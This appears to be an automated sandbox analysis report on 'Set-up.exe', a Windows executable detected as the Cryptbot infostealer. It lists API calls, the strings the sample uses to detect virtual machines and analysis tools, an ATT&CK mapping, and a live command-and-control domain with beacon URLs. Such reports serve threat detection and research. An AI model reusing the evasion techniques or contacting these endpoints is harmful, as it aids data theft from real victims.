Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00298F90	0_2_00298F90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00522F90	0_2_00522F90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004F6F80	0_2_004F6F80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0035AFC0	0_2_0035AFC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003BAFC0	0_2_003BAFC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003D3020	0_2_003D3020
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0052F010	0_2_0052F010
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003AF040	0_2_003AF040
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001E10E6	0_2_001E10E6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003C1100	0_2_003C1100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002F1140	0_2_002F1140
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A1190	0_2_003A1190
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003AD1D0	0_2_003AD1D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0035D230	0_2_0035D230
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0026B2D0	0_2_0026B2D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00357310	0_2_00357310
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004733F0	0_2_004733F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003BB3F0	0_2_003BB3F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0054B380	0_2_0054B380
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0053D430	0_2_0053D430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0053F430	0_2_0053F430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002F3450	0_2_002F3450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003AB4B0	0_2_003AB4B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005474A0	0_2_005474A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003BF5B0	0_2_003BF5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005235C0	0_2_005235C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0023F5B0	0_2_0023F5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005355E0	0_2_005355E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001DD5C0	0_2_001DD5C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005435B0	0_2_005435B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00539650	0_2_00539650

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 002E9720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001ECD40 appears 49 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 003ACBC0 appears 400 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 003AA170 appears 40 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 003AC9B0 appears 73 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00387310 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 002B44A0 appears 70 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00214FD0 appears 213 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00214F40 appears 272 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 003ACA40 appears 73 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001D75A0 appears 466 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00558B80 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 002150A0 appears 48 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001D71E0 appears 38 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001DCAA0 appears 54 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00387220 appears 662 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00215340 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001D73F0 appears 89 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00387120 appears 47 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001ECCD0 appears 38 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal88.troj.spyw.evad.winEXE@1/0@9/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_001ED090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_001ED090

Source: C:\Users\user\Desktop\Set-up.exe

0_2_001D255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_001D29FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_001D29FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe

Virustotal: Detection: 33%

Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 8022664 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4b1400
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x166a00
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151a00

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00568C8A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,

0_2_00568C8A

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015EBDD4 push eax; iretd	0_3_015EBDD5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015EBDD4 push eax; iretd	0_3_015EBDD5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015EBDD4 push eax; iretd	0_3_015EBDD5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015EBDD4 push eax; iretd	0_3_015EBDD5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005541D0 push eax; mov dword ptr [esp], edx	0_2_005541D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003F0300 push eax; mov dword ptr [esp], 00000000h	0_2_003F0305
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00278640 push eax; mov dword ptr [esp], edx	0_2_00278645
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0024C6D0 push eax; mov dword ptr [esp], edx	0_2_0024C6D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0028C7F0 push eax; mov dword ptr [esp], 00000000h	0_2_0028C743
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00210AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00210AC4
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00331130 push eax; mov dword ptr [esp], edx	0_2_00331135
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00231430 push eax; mov dword ptr [esp], 00000000h	0_2_00231433

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_001D29FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

0_2_001D29FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 7.0 %

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001D255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_001D255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001D29FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_001D29FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003AE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_003AE270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_001D255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_001D255D

Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000002.2343286882.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341075719.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341194801.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340945247.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Set-up.exe, 00000000.00000003.2125383743.0000000001583000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll//\l
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.2125620067.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

0_2_001D29FF

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00568C8A

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001D116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_001D116C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001D1160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_001D1160
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001D11A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_001D11A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001D13C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,	0_2_001D13C9

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_003B93D0 GetSystemTime,SystemTimeToFileTime,

0_2_003B93D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_006781F0 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_006781F0

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 1708, type: MEMORYSTR

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.6:49759 -> 34.147.147.173:80

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 1708, type: MEMORYSTR

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_0020A550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0029AA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_0029AA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0021E520 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_0021E520

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	34%	Virustotal		Browse

Source	Detection	Scanner	Label
https://httpbin.org/ipocal	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0ts	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ67	0%	Avira URL Cloud	safe
a.dnspod.com3vs.top	0%	Avira URL Cloud	safe
home.thirttj13vs.top	0%	Avira URL Cloud	safe
zgPhome.thirttj13vs.top	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467fd4	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467	0%	Avira URL Cloud	safe
tope.thirttj13vs.top	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467963	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467http://home.thirttj13vs.top/KQOoGKPKGzBeuS	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.thirttj13vs.top	34.147.147.173	true	true		unknown
httpbin.org	50.19.58.113	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0	true	Avira URL Cloud: safe	unknown
tope.thirttj13vs.top	true	Avira URL Cloud: safe	unknown
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467	true	Avira URL Cloud: safe	unknown
a.dnspod.com3vs.top	true	Avira URL Cloud: safe	unknown
zgPhome.thirttj13vs.top	true	Avira URL Cloud: safe	unknown
home.thirttj13vs.top	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://html4/loose.dtd	Set-up.exe	false		high
https://httpbin.org/ipocal	Set-up.exe, 00000000.00000003.2125383743.0000000001583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/ipbefore	Set-up.exe	false		high
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0ts	Set-up.exe, 00000000.00000002.2343306605.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2307164518.0000000001600000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2307298080.0000000001600000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340863254.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2320581422.00000000015F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2320489291.00000000015FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://.css	Set-up.exe	false		high
